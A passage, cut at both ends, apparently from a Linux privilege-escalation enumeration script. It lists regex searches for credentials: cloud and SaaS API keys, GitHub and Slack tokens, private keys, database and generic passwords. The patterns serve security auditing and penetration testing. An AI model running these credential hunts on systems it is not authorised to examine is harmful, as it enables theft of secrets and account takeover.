\\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{4})['\"]" 1 12783 search_for_regex "Blockchain API Key" "mainnet[a-zA-Z0-9]{32}|testnet[a-zA-Z0-9]{32}|ipfs[a-zA-Z0-9]{32}" 12784 search_for_regex "Blockfrost API Key" "(blockchain[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[0-9a-f]{12})['\"]" 1 12785 search_for_regex "Box API Key" "(box[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9]{32})['\"]" 1 12786 search_for_regex "Bravenewcoin API Key" "(bravenewcoin[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{50})['\"]" 1 12787 search_for_regex "Clearbit API Key" "sk_[a-z0-9]{32}" 12788 search_for_regex "Clojars API Key" "(CLOJARS_)[a-zA-Z0-9]{60}" 12789 search_for_regex "Cloudinary Basic Auth" "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" 12790 search_for_regex "Coinlayer API Key" "(coinlayer[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{32})['\"]" 1 12791 search_for_regex "Coinlib API Key" "(coinlib[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{16})['\"]" 1 12792 search_for_regex "Contentful delivery API Key" "(contentful[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9=_\\-]{43})['\"]" 1 12793 search_for_regex "Covalent API Key" "ckey_[a-z0-9]{27}" 12794 search_for_regex "Charity Search API Key" "(charity.?search[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{32})['\"]" 1 12795 search_for_regex "Databricks API Key" "dapi[a-h0-9]{32}" 12796 search_for_regex "DDownload API Key" "(ddownload[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{22})['\"]" 1 12797 search_for_regex "Defined Networking API token" "(dnkey-[a-z0-9=_\\-]{26}-[a-z0-9=_\\-]{52})" 12798 search_for_regex "Discord API Key, Client ID & Client Secret" "((discord[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-h0-9]{64}|[0-9]{18}|[a-z0-9=_\\-]{32})['\"])" 1 12799 search_for_regex "Dropbox API Key" "sl.[a-zA-Z0-9_-]{136}" 12800 search_for_regex "Doppler API Key" "(dp\\.pt\\.)[a-zA-Z0-9]{43}" 12801 search_for_regex "Dropbox API secret/key, short & long lived API Key" "(dropbox[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{15}|sl\\.[a-z0-9=_\\-]{135}|[a-z0-9]{11}(AAAAAAAAAA)[a-z0-9_=\\-]{43})['\"]" 1 12802 search_for_regex "Duffel API Key" "duffel_(test|live)_[a-zA-Z0-9_-]{43}" 12803 search_for_regex "Dynatrace API Key" "dt0c01\\.[a-zA-Z0-9]{24}\\.[a-z0-9]{64}" 12804 search_for_regex "EasyPost API Key" "EZAK[a-zA-Z0-9]{54}" 12805 search_for_regex "EasyPost test API Key" "EZTK[a-zA-Z0-9]{54}" 12806 search_for_regex "Etherscan API Key" "(etherscan[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([A-Z0-9]{34})['\"]" 12807 search_for_regex "Facebook Access Token" "EAACEdEose0cBA[0-9A-Za-z]+" 12808 search_for_regex "Facebook Client ID" "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" 12809 search_for_regex "Facebook Oauth" "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" 12810 search_for_regex "Facebook Secret Key" "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" 12811 search_for_regex "Fastly API Key" "(fastly[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9=_\\-]{32})['\"]" 1 12812 search_for_regex "Finicity API Key & Client Secret" "(finicity[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-f0-9]{32}|[a-z0-9]{20})['\"]" 1 12813 search_for_regex "Flutterweave Keys" "FLWPUBK_TEST-[a-hA-H0-9]{32}-X|FLWSECK_TEST-[a-hA-H0-9]{32}-X|FLWSECK_TEST[a-hA-H0-9]{12}" 12814 search_for_regex "Frame.io API Key" "fio-u-[a-zA-Z0-9_=\\-]{64}" 12815 search_for_regex "Github" "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" 12816 search_for_regex "Github App Token" "(ghu|ghs)_[0-9a-zA-Z]{36}" 12817 search_for_regex "Github OAuth Access Token" "gho_[0-9a-zA-Z]{36}" 12818 search_for_regex "Github Personal Access Token" "ghp_[0-9a-zA-Z]{36}" 12819 search_for_regex "Github Refresh Token" "ghr_[0-9a-zA-Z]{76}" 12820 search_for_regex "GitHub Fine-Grained Personal Access Token" "github_pat_[0-9a-zA-Z_]{82}" 12821 search_for_regex "Gitlab Personal Access Token" "glpat-[0-9a-zA-Z\\-]{20}" 12822 search_for_regex "GitLab Pipeline Trigger Token" "glptt-[0-9a-f]{40}" 12823 search_for_regex "GitLab Runner Registration Token" "GR1348941[0-9a-zA-Z_\\-]{20}" 12824 search_for_regex "GoCardless API Key" "live_[a-zA-Z0-9_=\\-]{40}" 12825 search_for_regex "GoFile API Key" "(gofile[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9]{32})['\"]" 1 12826 search_for_regex "Google API Key" "AIza[0-9A-Za-z_\\-]{35}" 12827 search_for_regex "Google Cloud Platform API Key" "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\\-]{35}]['\"]" 12828 search_for_regex "Google Drive Oauth" "[0-9]+-[0-9A-Za-z_]{32}\\.apps\\.googleusercontent\\.com" 12829 search_for_regex "Google Oauth Access Token" "ya29\\.[0-9A-Za-z_\\-]+" 12830 search_for_regex "Google (GCP) Service-account" "\"type.+:.+\"service_account" 12831 search_for_regex "Grafana API Key" "eyJrIjoi[a-z0-9_=\\-]{72,92}" 1 12832 search_for_regex "Grafana cloud api token" "glc_[A-Za-z0-9\\+/]{32,}={0,2}" 12833 search_for_regex "Grafana service account token" "(glsa_[A-Za-z0-9]{32}_[A-Fa-f0-9]{8})" 12834 search_for_regex "Hashicorp Terraform user/org API Key" "[a-z0-9]{14}\\.atlasv1\\.[a-z0-9_=\\-]{60,70}" 12835 search_for_regex "Heroku API Key" "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" 12836 search_for_regex "Hubspot API Key" "['\"][a-h0-9]{8}-[a-h0-9]{4}-[a-h0-9]{4}-[a-h0-9]{4}-[a-h0-9]{12}['\"]" 1 12837 search_for_regex "Instatus API Key" "(instatus[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{32})['\"]" 1 12838 search_for_regex "Intercom API Key & Client Secret/ID" "(intercom[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9=_]{60}|[a-h0-9]{8}-[a-h0-9]{4}-[a-h0-9]{4}-[a-h0-9]{4}-[a-h0-9]{12})['\"]" 1 12839 search_for_regex "Ionic API Key" "(ionic[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"](ion_[a-z0-9]{42})['\"]" 1 12840 search_for_regex "Jenkins Creds" "<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<" 12841 search_for_regex "JSON Web Token" "(ey[0-9a-z]{30,34}\\.ey[0-9a-z\\/_\\-]{30,}\\.[0-9a-zA-Z\\/_\\-]{10,}={0,2})" 12842 search_for_regex "Linear API Key" "(lin_api_[a-zA-Z0-9]{40})" 12843 search_for_regex "Linear Client Secret/ID" "((linear[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-f0-9]{32})['\"])" 12844 search_for_regex "LinkedIn Client ID" "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" 12845 search_for_regex "LinkedIn Secret Key" "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" 12846 search_for_regex "Lob API Key" "((lob[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]((live|test)_[a-f0-9]{35})['\"])|((lob[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]((test|live)_pub_[a-f0-9]{31})['\"])" 1 12847 search_for_regex "Lob Publishable API Key" "((test|live)_pub_[a-f0-9]{31})" 12848 search_for_regex "MailboxValidator" "(mailbox.?validator[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([A-Z0-9]{20})['\"]" 1 12849 search_for_regex "Mailchimp API Key" "[0-9a-f]{32}-us[0-9]{1,2}" 12850 search_for_regex "Mailgun API Key" "key-[0-9a-zA-Z]{32}'" 12851 search_for_regex "Mailgun Public Validation Key" "pubkey-[a-f0-9]{32}" 12852 search_for_regex "Mailgun Webhook signing key" "[a-h0-9]{32}-[a-h0-9]{8}-[a-h0-9]{8}" 12853 search_for_regex "Mandrill API Key" "md-[A-Za-z0-9]{22}" 12854 search_for_regex "Mapbox API Key" "(pk\\.[a-z0-9]{60}\\.[a-z0-9]{22})" 1 12855 search_for_regex "MessageBird API Key & API client ID" "(messagebird[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{25}|[a-h0-9]{8}-[a-h0-9]{4}-[a-h0-9]{4}-[a-h0-9]{4}-[a-h0-9]{12})['\"]" 1 12856 search_for_regex "Microsoft Teams Webhook" "https:\\/\\/[a-z0-9]+\\.webhook\\.office\\.com\\/webhookb2\\/[a-z0-9]{8}-([a-z0-9]{4}-){3}[a-z0-9]{12}@[a-z0-9]{8}-([a-z0-9]{4}-){3}[a-z0-9]{12}\\/IncomingWebhook\\/[a-z0-9]{32}\\/[a-z0-9]{8}-([a-z0-9]{4}-){3}[a-z0-9]{12}" 12857 search_for_regex "New Relic User API Key, User API ID & Ingest Browser API Key" "(NRAK-[A-Z0-9]{27})|((newrelic[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([A-Z0-9]{64})['\"])|(NRJS-[a-f0-9]{19})" 12858 search_for_regex "Nownodes" "(nownodes[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([A-Za-z0-9]{32})['\"]" 12859 search_for_regex "Npm Access Token" "(npm_[a-zA-Z0-9]{36})" 12860 search_for_regex "OpenAI API Token" "sk-[A-Za-z0-9]{48}" 12861 search_for_regex "ORB Intelligence Access Key" "['\"][a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}['\"]" 12862 search_for_regex "Pastebin API Key" "(pastebin[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{32})['\"]" 1 12863 search_for_regex "PayPal Braintree Access Token" "access_token\\$production\\$[0-9a-z]{16}\\$[0-9a-f]{32}" 12864 search_for_regex "Picatic API Key" "sk_live_[0-9a-z]{32}" 12865 search_for_regex "Pinata API Key" "(pinata[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{64})['\"]" 1 12866 search_for_regex "Planetscale API Key" "pscale_tkn_[a-zA-Z0-9_\\.\\-]{43}" 12867 search_for_regex "PlanetScale OAuth token" "(pscale_oauth_[a-zA-Z0-9_\\.\\-]{32,64})" 12868 search_for_regex "Planetscale Password" "pscale_pw_[a-zA-Z0-9_\\.\\-]{43}" 12869 search_for_regex "Plaid API Token" "(access-(?:sandbox|development|production)-[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})" 12870 search_for_regex "Prefect API token" "(pnu_[a-z0-9]{36})" 12871 search_for_regex "Postman API Key" "PMAK-[a-fA-F0-9]{24}-[a-fA-F0-9]{34}" 12872 search_for_regex "Private Keys" "\\-\\-\\-\\-\\-BEGIN PRIVATE KEY\\-\\-\\-\\-\\-|\\-\\-\\-\\-\\-BEGIN RSA PRIVATE KEY\\-\\-\\-\\-\\-|\\-\\-\\-\\-\\-BEGIN OPENSSH PRIVATE KEY\\-\\-\\-\\-\\-|\\-\\-\\-\\-\\-BEGIN PGP PRIVATE KEY BLOCK\\-\\-\\-\\-\\-|\\-\\-\\-\\-\\-BEGIN DSA PRIVATE KEY\\-\\-\\-\\-\\-|\\-\\-\\-\\-\\-BEGIN EC PRIVATE KEY\\-\\-\\-\\-\\-" 12873 search_for_regex "Pulumi API Key" "pul-[a-f0-9]{40}" 12874 search_for_regex "PyPI upload token" "pypi-AgEIcHlwaS5vcmc[A-Za-z0-9_\\-]{50,}" 12875 search_for_regex "Quip API Key" "(quip[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9]{15}=\\|[0-9]{10}\\|[a-zA-Z0-9\\/+]{43}=)['\"]" 1 12876 search_for_regex "Rubygem API Key" "rubygems_[a-f0-9]{48}" 12877 search_for_regex "Readme API token" "rdme_[a-z0-9]{70}" 12878 search_for_regex "Sendbird Access ID" "([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})" 12879 search_for_regex "Sendgrid API Key" "SG\\.[a-zA-Z0-9_\\.\\-]{66}" 12880 search_for_regex "Sendinblue API Key" "xkeysib-[a-f0-9]{64}-[a-zA-Z0-9]{16}" 12881 search_for_regex "Shippo API Key, Access Token, Custom Access Token, Private App Access Token & Shared Secret" "shippo_(live|test)_[a-f0-9]{40}|shpat_[a-fA-F0-9]{32}|shpca_[a-fA-F0-9]{32}|shppa_[a-fA-F0-9]{32}|shpss_[a-fA-F0-9]{32}" 12882 search_for_regex "Sidekiq Secret" "([a-f0-9]{8}:[a-f0-9]{8})" 12883 search_for_regex "Sidekiq Sensitive URL" "([a-f0-9]{8}:[a-f0-9]{8})@(?:gems.contribsys.com|enterprise.contribsys.com)" 12884 search_for_regex "Slack Token" "xox[baprs]-([0-9a-zA-Z]{10,48})?" 12885 search_for_regex "Slack Webhook" "https://hooks.slack.com/services/T[a-zA-Z0-9_]{10}/B[a-zA-Z0-9_]{10}/[a-zA-Z0-9_]{24}" 12886 search_for_regex "Smarksheel API Key" "(smartsheet[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{26})['\"]" 1 12887 search_for_regex "Square Access Token" "sqOatp-[0-9A-Za-z_\\-]{22}" 12888 search_for_regex "Square API Key" "EAAAE[a-zA-Z0-9_-]{59}" 12889 search_for_regex "Square Oauth Secret" "sq0csp-[ 0-9A-Za-z_\\-]{43}" 12890 search_for_regex "Stytch API Key" "secret-.*-[a-zA-Z0-9_=\\-]{36}" 12891 search_for_regex "Stripe Access Token & API Key" "(sk|pk)_(test|live)_[0-9a-z]{10,32}|k_live_[0-9a-zA-Z]{24}" 1 12892 search_for_regex "Telegram Bot API Token" "[0-9]+:AA[0-9A-Za-z\\\\-_]{33}" 12893 search_for_regex "Trello API Key" "(trello[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([0-9a-z]{32})['\"]" 12894 search_for_regex "Twilio API Key" "SK[0-9a-fA-F]{32}" 12895 search_for_regex "Twitch API Key" "(twitch[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{30})['\"]" 12896 search_for_regex "Twitter Client ID" "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" 12897 search_for_regex "Twitter Bearer Token" "(A{22}[a-zA-Z0-9%]{80,100})" 12898 search_for_regex "Twitter Oauth" "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\\\s][0-9a-zA-Z]{35,44}['\"\\\\s]" 12899 search_for_regex "Twitter Secret Key" "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" 12900 search_for_regex "Typeform API Key" "tfp_[a-z0-9_\\.=\\-]{59}" 12901 search_for_regex "URLScan API Key" "['\"][a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}['\"]" 12902 search_for_regex "Yandex Access Token" "(t1\\.[A-Z0-9a-z_-]+[=]{0,2}\\.[A-Z0-9a-z_-]{86}[=]{0,2})" 12903 search_for_regex "Yandex API Key" "(AQVN[A-Za-z0-9_\\-]{35,38})" 12904 search_for_regex "Web3 API Key" "(web3[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([A-Za-z0-9_=\\-]+\\.[A-Za-z0-9_=\\-]+\\.?[A-Za-z0-9_.+/=\\-]*)['\"]" 1 12905 echo '' 12906 12907 print_2title "Searching Misc" 12908 search_for_regex "Generic Secret" "[sS][eE][cC][rR][eE][tT].*['\"][0-9a-zA-Z]{32,45}['\"]" 12909 search_for_regex "PHP defined password" "define ?\\(['\"](\\w*pass|\\w*pwd|\\w*user|\\w*datab)" 12910 search_for_regex "Simple Passwords" "passw.*[=:].+" 12911 search_for_regex "Generic API tokens search (A-C)" "(access_key|access_token|account_sid|admin_email|admin_pass|admin_user|adzerk_api_key|algolia_admin_key|algolia_api_key| algolia_search_key|alias_pass|alicloud_access_key|alicloud_secret_key|amazon_bucket_name|amazon_secret_access_key| amazonaws|anaconda_token|android_docs_deploy_token|ansible_vault_password|aos_key|aos_sec| api_key|api_key_secret|api_key_sid|api_secret|apiary_api_key|apigw_access_token|api.googlemaps|AIza|apidocs| apikey|apiSecret|app_bucket_perm|appclientsecret|app_debug|app_id|appkey|appkeysecret|app_key|app_log_level|app_report_token_key| app_secret|app_token|apple_id_password|application_key|appsecret|appspot|argos_token|artifactory_key|artifacts_aws_access_key_id| artifacts_aws_secret_access_key|artifacts_bucket|artifacts_key|artifacts_secret|assistant_iam_apikey|auth0_api_clientsecret| auth0_client_secret|auth_token|authorizationToken|author_email_addr|author_npm_api_key|authsecret|awsaccesskeyid|aws_access| aws_access_key|aws_access_key_id|aws_bucket|aws_config_accesskeyid|aws_key|aws_secret|aws_secret_access_key|awssecretkey| aws_secret_key|aws_secrets|aws_ses_access_key_id|aws_ses_secret_access_key|aws_token|awscn_access_key_id|awscn_secret_access_key| AWSSecretKey|b2_app_key|b2_bucket|bashrc password|bintray_api_key|bintray_apikey|bintray_gpg_password|bintray_key| bintray_token|bintraykey|bluemix_api_key|bluemix_auth|bluemix_pass|bluemix_pass_prod|bluemix_password|bluemix_pwd|bluemix_username brackets_repo_oauth_token|browser_stack_access_key|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id| bucketeer_aws_secret_access_key|built_branch_deploy_key|bundlesize_github_token|bx_password|bx_username|cache_driver| cache_s3_secret_key|cargo_token|cattle_access_key|cattle_agent_instance_auth|cattle_secret_key|censys_secret|certificate_password| cf_password|cheverny_token|chrome_client_secret|chrome_refresh_token|ci_deploy_password|ci_project_url|ci_registry_user| ci_server_name|ci_user_token|claimr_database|claimr_db|claimr_superuser|claimr_token|cli_e2e_cma_token|client_secret| client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key| cloudant_archived_database|cloudant_audited_database|cloudant_database|cloudant_instance|cloudant_order_database| cloudant_parsed_database|cloudant_password|cloudant_processed_database|cloudant_service_database| cloudflare_api_key|cloudflare_auth_email|cloudflare_auth_key|cloudflare_email|cloudinary_api_secret|cloudinary_name| cloudinary_url|cloudinary_url_staging|clu_repo_url|clu_ssh_private_key_base64|cn_access_key_id|cn_secret_access_key| cocoapods_trunk_email|cocoapods_trunk_token|codacy_project_token|codeclimate_repo_token|codecov_token|coding_token| conekta_apikey|conn.login|connectionstring|consumerkey|consumer_key|consumer_secret|contentful_access_token| contentful_cma_test_token|contentful_integration_management_token|contentful_integration_management_token| contentful_management_api_access_token|contentful_management_api_access_token_new|contentful_php_management_test_token| contentful_test_org_cma_token|contentful_v2_access_token|conversation_password|conversation_username|cos_secrets| coveralls_api_token|coveralls_repo_token|coveralls_token|coverity_scan_token|credentials| cypress_record_key)[a-z0-9_ .,<\\-]{0,25}(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([0-9a-zA-Z_=\\-]{8,64})['\"]" 12912 search_for_regex "Generic API tokens search (D-H)" "(danger_github_api_token|database_host|database_name|database_password|database_port|database_schema_test| database_user|database_username|datadog_api_key|datadog_app_key|db_connection|db_database|db_host|db_password| db_pw|db_server|db_user|db_username|dbpasswd|dbpassword|dbuser|ddg_test_email|ddg_test_email_pw|ddgc_github_token| deploy_password|deploy_secure|deploy_token|deploy_user|dgpg_passphrase|digitalocean_access_token| digitalocean_ssh_key_body|digitalocean_ssh_key_ids|docker_hub_password|docker_key|docker_pass|docker_passwd| docker_password|docker_postgres_url|docker_token|dockerhub_password|dockerhubpassword|doordash_auth_token| dot-files|dotfiles|dropbox_oauth_bearer|droplet_travis_password|dsonar_login|dsonar_projectkey|dynamoaccesskeyid| dynamosecretaccesskey|elastic_cloud_auth|elastica_host|elastica_port|elasticsearch_password|encryption_key| encryption_password|end_user_password|env_github_oauth_token|env_heroku_api_key|env_key|env_secret|env_secret_access_key| env_sonatype_password|eureka_awssecretkey|env.heroku_api_key|env.sonatype_password|eureka.awssecretkey|exp_password| file_password|firebase_api_json|firebase_api_token|firebase_key|firebase_project_develop|firebase_token|firefox_secret| flask_secret_key|flickr_api_key|flickr_api_secret|fossa_api_key|ftp_host|ftp_login|ftp_password|ftp_pw|ftp_user|ftp_username| gcloud_bucket|gcloud_project|gcloud_service_key|gcr_password|gcs_bucket|gh_api_key|gh_email|gh_next_oauth_client_secret| gh_next_unstable_oauth_client_id|gh_next_unstable_oauth_client_secret|gh_oauth_client_secret|gh_oauth_token|gh_repo_token| gh_token|gh_unstable_oauth_client_secret|ghb_token|ghost_api_key|git_author_email|git_author_name|git_committer_email| git_committer_name|git_email|git_name|git_token|github_access_token|github_api_key|github_api_token|github_auth|github_auth_token| github_auth_token|github_client_secret|github_deploy_hb_doc_pass|github_deployment_token|github_hunter_token|github_hunter_username| github_key|github_oauth|github_oauth_token|github_oauth_token|github_password|github_pwd|github_release_token|github_repo| github_token|github_tokens|gitlab_user_email|gogs_password|google_account_type|google_client_email|google_client_id|google_client_secret| google_maps_api_key|google_private_key|gpg_key_name|gpg_keyname|gpg_ownertrust|gpg_passphrase|gpg_private_key|gpg_secret_keys| gradle_publish_key|gradle_publish_secret|gradle_signing_key_id|gradle_signing_password|gren_github_token|grgit_user|hab_auth_token| hab_key|hb_codesign_gpg_pass|hb_codesign_key_pass|heroku_api_key|heroku_email|heroku_token|hockeyapp_token|homebrew_github_api_token| hub_dxia2_password)[a-z0-9_ .,<\\-]{0,25}(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([0-9a-zA-Z_=\\-]{8,64})['\"]" 12913 search_for_regex "Generic API tokens search (I-R)" "(ij_repo_password|ij_repo_username|index_name|integration_test_api_key|integration_test_appid|internal_secrets| ios_docs_deploy_token|itest_gh_token|jdbc_databaseurl|jdbc_host|jdbc:mysql|jwt_secret|kafka_admin_url|kafka_instance_name|kafka_rest_url| keystore_pass|kovan_private_key|kubecfg_s3_path|kubeconfig|kxoltsn3vogdop92m|leanplum_key|lektor_deploy_password|lektor_deploy_username| lighthouse_api_key|linkedin_client_secretorlottie_s3_api_key|linux_signing_key|ll_publish_url|ll_shared_key|looker_test_runner_client_secret| lottie_happo_api_key|lottie_happo_secret_key|lottie_s3_secret_key|lottie_upload_cert_key_password|lottie_upload_cert_key_store_password| mail_password|mailchimp_api_key|mailchimp_key|mailer_password|mailgun_api_key|mailgun_apikey|mailgun_password|mailgun_priv_key| mailgun_pub_apikey|mailgun_pub_key|mailgun_secret_api_key|manage_key|manage_secret|management_token|managementapiaccesstoken| manifest_app_token|manifest_app_url|mapbox_access_token|mapbox_api_token|mapbox_aws_access_key_id|mapbox_aws_secret_access_key| mapboxaccesstoken|mg_api_key|mg_public_api_key|mh_apikey|mh_password|mile_zero_key|minio_access_key|minio_secret_key|multi_bob_sid| multi_connect_sid|multi_disconnect_sid|multi_workflow_sid|multi_workspace_sid|my_secret_env|mysql_database|mysql_hostname|mysql_password| mysql_root_password|mysql_user|mysql_username|mysqlmasteruser|mysqlsecret|nativeevents|netlify_api_key|new_relic_beta_token|nexus_password| nexuspassword|ngrok_auth_token|ngrok_token|node_env|node_pre_gyp_accesskeyid|node_pre_gyp_github_token|node_pre_gyp_secretaccesskey| non_token|now_token|npm_api_key|npm_api_token|npm_auth_token|npm_email|npm_password|npm_secret_key|npm_token|nuget_api_key|nuget_apikey| nuget_key|numbers_service_pass|oauth_token|object_storage_password|object_storage_region_name|object_store_bucket|object_store_creds| oc_pass|octest_app_password|octest_app_username|octest_password|ofta_key|ofta_region|ofta_secret|okta_client_token|okta_oauth2_client_secret| okta_oauth2_clientsecret|onesignal_api_key|onesignal_user_auth_key|open_whisk_key|openwhisk_key|org_gradle_project_sonatype_nexus_password| org_project_gradle_sonatype_nexus_password|os_auth_url|os_password|ossrh_jira_password|ossrh_pass|ossrh_password|ossrh_secret| ossrh_username|packagecloud_token|pagerduty_apikey|parse_js_key|passwordtravis|paypal_client_secret|percy_project|percy_token|personal_key| personal_secret|pg_database|pg_host|places_api_key|places_apikey|plotly_apikey|plugin_password|postgresql_db|postgresql_pass| postgres_env_postgres_db|postgres_env_postgres_password|preferred_username|pring_mail_username|private_signing_password|prod_access_key_id| prod_password|prod_secret_key|project_config|publish_access|publish_key|publish_secret|pushover_token|pypi_passowrd|qiita_token| quip_token|rabbitmq_password|randrmusicapiaccesstoken|redis_stunnel_urls|rediscloud_url|refresh_token|registry_pass|registry_secure| release_gh_token|release_token|reporting_webdav_pwd|reporting_webdav_url|repotoken|rest_api_key|rinkeby_private_key|ropsten_private_key| route53_access_key_id|rtd_key_pass|rtd_store_pass|rubygems_auth_token)[a-z0-9_ .,<\\-]{0,25}(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([0-9a-zA-Z_=\\-]{8,64})['\"]" 12914 search_for_regex "Generic API tokens search (S-Z)" "(s3_access_key|s3_access_key_id|s3_bucket_name_app_logs|s3_bucket_name_assets|s3_external_3_amazonaws_com|s3_key| s3_key_app_logs|s3_key_assets|s3_secret_app_logs|s3_secret_assets|s3_secret_key|s3_user_secret|sacloud_access_token| sacloud_access_token_secret|sacloud_api|salesforce_bulk_test_password|salesforce_bulk_test_security_token| sandbox_access_token|sandbox_aws_access_key_id|sandbox_aws_secret_access_key|sauce_access_key|scrutinizer_token|sdr_token|secret_0| secret_1|secret_10|secret_11|secret_2|secret_3|secret_4|secret_5|secret_6|secret_7|secret_8|secret_9|secret_key_base|secretaccesskey| secret_key_base|segment_api_key|selion_log_level_dev|selion_selenium_host|sendgrid|sendgrid_api_key|sendgrid_key|sendgrid_password|sendgrid_user| sendgrid_username|sendwithus_key|sentry_auth_token|sentry_default_org|sentry_endpoint|sentry_secret|sentry_key|service_account_secret|ses_access_key| ses_secret_key|setdstaccesskey|setdstsecretkey|setsecretkey|signing_key|signing_key_password|signing_key_secret|signing_key_sid|slash_developer_space| slash_developer_space_key|slate_user_email|snoowrap_client_secret|snoowrap_password|snoowrap_refresh_token|snyk_api_token|snyk_token| socrata_app_token|socrata_password|sonar_organization_key|sonar_project_key|sonar_token|sonatype_gpg_key_name|sonatype_gpg_passphrase| sonatype_nexus_password|sonatype_pass|sonatype_password|sonatype_token_password|sonatype_token_user|sonatypepassword|soundcloud_client_secret| soundcloud_password|spaces_access_key_id|spaces_secret_access_key|spotify_api_access_token|spotify_api_client_secret|spring_mail_password|sqsaccesskey| sqssecretkey|square_reader_sdk_repository_password|srcclr_api_token|sshpass|ssmtp_config|staging_base_url_runscope|star_test_aws_access_key_id| star_test_bucket|star_test_location|star_test_secret_access_key|starship_account_sid|starship_auth_token|stormpath_api_key_id|stormpath_api_key_secret| strip_publishable_key|strip_secret_key|stripe_private|stripe_public|surge_login|surge_token|svn_pass|tesco_api_key|test_github_token| test_test|tester_keys_password|thera_oss_access_key|token_core_java|travis_access_token|travis_api_token|travis_branch|travis_com_token|travis_e2e_token| travis_gh_token|travis_pull_request|travis_secure_env_vars|travis_token|trex_client_token|trex_okta_client_token|twilio_api_key|twilio_api_secret| 